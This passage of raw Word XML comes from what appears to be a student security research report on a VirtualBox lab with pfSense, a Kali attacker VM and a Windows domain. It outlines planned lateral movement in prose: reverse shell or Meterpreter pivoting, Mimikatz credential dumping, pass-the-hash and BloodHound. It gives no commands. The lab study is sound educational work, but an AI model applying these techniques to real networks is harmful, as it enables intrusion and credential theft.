          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Within the PfSense Firewall, four network interfaces can be utilized to simulate a segmented network environment; The WAN interface (Adapter 1) will be connected to the Kali Linux ‘Attacker’ VM, simulating an external attacker accessing the network. Three additional interfaces will serve as internal network gateways: Adapter 2 for Subnet A (LAN-A, vmx1/vtnet1), Adapter 3 for Subnet B (LAN-B, vmx2/vtnet2), and Adapter 4 for Subnet C (LAN-C, vmx3/vtnet3). Each subnet will be configured as an isolated /24 network, with PfSense acting as the default gateway to ensure traffic segmentation. Wireshark will be employed on the machines in Subnets A, B, and C for traffic analysis</w:t>
      </w:r>
      <w:r w:rsidR="009D398F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E7979" w14:textId="77777777" w:rsidR="00AB0891" w:rsidRPr="00FF6966" w:rsidRDefault="00AB0891" w:rsidP="00585FFF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E54C8D6" w14:textId="038F5A6F" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="009D398F" w:rsidP="00ED0149">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A060F40" w14:textId="3BEA7300" w:rsidR="00362920" w:rsidRPr="00FF6966" w:rsidRDefault="00001487" w:rsidP="00E7596C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00453D74" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a proposed topology including network segmentation</w:t>
      </w:r>
      <w:r w:rsidR="00362920" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the project milestone 2 report.</w:t>
      </w:r>
      <w:r w:rsidR="005A40ED" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Please take note that Cisco packet tracer</w:t>
      </w:r>
      <w:r w:rsidR="00C05E19" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00967610" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[10</w:t>
      </w:r>
      <w:r w:rsidR="00C05E19" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="005A40ED" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B37BD" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00F61150" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>utilized</w:t>
      </w:r>
      <w:r w:rsidR="005B37BD" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to visualize the device roles </w:t>
      </w:r>
      <w:r w:rsidR="00A317F8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">graphically and that the labels to the devices aren’t the actual </w:t>
      </w:r>
      <w:r w:rsidR="00416829" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cisco</w:t>
      </w:r>
      <w:r w:rsidR="00E53704" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> devices themselves (VirtualBox VMs).</w:t>
      </w:r>
      <w:r w:rsidR="00533C40" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2 shows the “intnet” layout of </w:t>
      </w:r>
      <w:r w:rsidR="00A908DB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualBox’s virtual ports</w:t>
      </w:r>
      <w:r w:rsidR="005B2DED" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within </w:t>
      </w:r>
      <w:r w:rsidR="00A95B6F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the Win10 (192.168.1.3)</w:t>
      </w:r>
      <w:r w:rsidR="008848E7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Kali Linux (192.168.1.100), and </w:t>
      </w:r>
      <w:r w:rsidR="00DB7395" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Domain Controller Windows Server 2022 (192.168.1.2)</w:t>
      </w:r>
      <w:r w:rsidR="00E90D8E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00617326" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Please take note that </w:t>
      </w:r>
      <w:r w:rsidR="00ED7BC4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="0082139C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>igure</w:t>
      </w:r>
      <w:r w:rsidR="00ED7BC4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2’s </w:t>
      </w:r>
      <w:r w:rsidR="00D94418" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv4 schema is </w:t>
      </w:r>
      <w:r w:rsidR="009E1062" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">different from our own, </w:t>
      </w:r>
      <w:r w:rsidR="00E853B4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as it is a borrowed diagram.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7237E1FF" w14:textId="77777777" w:rsidR="00E2276B" w:rsidRPr="00FF6966" w:rsidRDefault="00F661DF" w:rsidP="00E2276B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="695F34F8" wp14:editId="50FF842F">
            <wp:extent cx="3093801" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="777548345" name="Picture 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48345" name="Picture 2" descr="A diagram of a computer network&#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4288" cy="2026145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF264A5" w14:textId="1C84BDFF" w:rsidR="00362920" w:rsidRPr="00FF6966" w:rsidRDefault="00E2276B" w:rsidP="00B210BD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00275409" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0081320B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00806A11" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proposed Segmented Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D69A62" w14:textId="54858D17" w:rsidR="00DA5CD2" w:rsidRPr="00FF6966" w:rsidRDefault="00B210BD" w:rsidP="00B210BD">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="600F1FA5" wp14:editId="3435FF01">
            <wp:extent cx="3089910" cy="2667635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45537521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75212" name="Picture 5"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9910" cy="2667635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D87D6" w14:textId="619A0C33" w:rsidR="00E5595B" w:rsidRPr="00FF6966" w:rsidRDefault="00B210BD" w:rsidP="00B210BD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00A84C75" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0081320B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="007570A8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0058486A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox </w:t>
      </w:r>
      <w:r w:rsidR="00BB66BF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Virtual Ports Diagram (</w:t>
      </w:r>
      <w:r w:rsidR="00A84C75" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>IPv4 Schema not ours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09311FDE" w14:textId="77777777" w:rsidR="00E2276B" w:rsidRPr="00FF6966" w:rsidRDefault="00E2276B" w:rsidP="00E2276B"/>
    <w:p w14:paraId="384F6FB7" w14:textId="018865E6" w:rsidR="00326D89" w:rsidRPr="00FF6966" w:rsidRDefault="00326D89" w:rsidP="00E7596C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unfortunately, we were</w:t>
      </w:r>
      <w:r w:rsidR="003953BD" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> able to fully implement network segmentation </w:t>
      </w:r>
      <w:r w:rsidR="00B744F6" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>within</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the given time that we were allocated for this research project. To remedy not having sufficient time to configure proper network segmentation, we settled for a more simplified topology where </w:t>
      </w:r>
      <w:r w:rsidR="00E316FA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all the devices would be on the same subnet</w:t>
      </w:r>
      <w:r w:rsidR="00383CB7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, shown </w:t>
      </w:r>
      <w:r w:rsidR="005A195E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>below</w:t>
      </w:r>
      <w:r w:rsidR="00697C0D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Figure 3</w:t>
      </w:r>
      <w:r w:rsidR="005A195E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F94073D" w14:textId="72362548" w:rsidR="00697C0D" w:rsidRPr="00FF6966" w:rsidRDefault="00645481" w:rsidP="00697C0D">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55C1967C" wp14:editId="52B55CFD">
            <wp:extent cx="3089910" cy="2184400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1082601651" name="Picture 6"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01651" name="Picture 6" descr="A diagram of a serv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9910" cy="2184400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F226058" w14:textId="63D15B7D" w:rsidR="008604B2" w:rsidRDefault="00697C0D" w:rsidP="008604B2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="001C72D9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0081320B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AC4D2B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E16C3" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Actual </w:t>
      </w:r>
      <w:r w:rsidR="001C72D9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3800044B" w14:textId="77777777" w:rsidR="00AB0891" w:rsidRPr="00AB0891" w:rsidRDefault="00AB0891" w:rsidP="00AB0891"/>
    <w:p w14:paraId="74D6F86A" w14:textId="4F3A9277" w:rsidR="008604B2" w:rsidRPr="00FF6966" w:rsidRDefault="008604B2" w:rsidP="008604B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Next Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D911E96" w14:textId="5B451C06" w:rsidR="002E77E8" w:rsidRPr="00FF6966" w:rsidRDefault="002E77E8" w:rsidP="002E77E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we have the base network finalized and confirmed that everything is functioning/simulating as it should, these are the next steps visualized. We know the real test starts with an established connection to a Windows 10 machine within Subnet A originating from the external Kali VM. So how do we plan to execute lateral movement? There are multiple </w:t>
      </w:r>
      <w:r w:rsidR="003953BD" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>orders</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of operations and tools possible for getting to Subnet C for fileserver access. One idea is to do this more manually to have a deeper understanding of all steps and exploits in detail </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>using that Windows 10 machine as a pivot point. It’ll be controlled through a reverse shell or Meterpreter session (initiated by Kali), allowing commands to be executed in</w:t>
      </w:r>
      <w:r w:rsidR="00F61150" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">memory to evade detection. We read that using tools like Mimikatz on PowerShell, we can extract credentials or hashes from memory, which can be leveraged for pass-the-hash attacks or other credential-based lateral movement methods. BloodHound is another popular tool that will be deployed to map the Active Directory environment identifying privileged accounts, vulnerable trust relationships, and exploitable paths to target in Subnet C. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434F4C3D" w14:textId="1D91AE82" w:rsidR="002E77E8" w:rsidRPr="00FF6966" w:rsidRDefault="002E77E8" w:rsidP="002E77E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
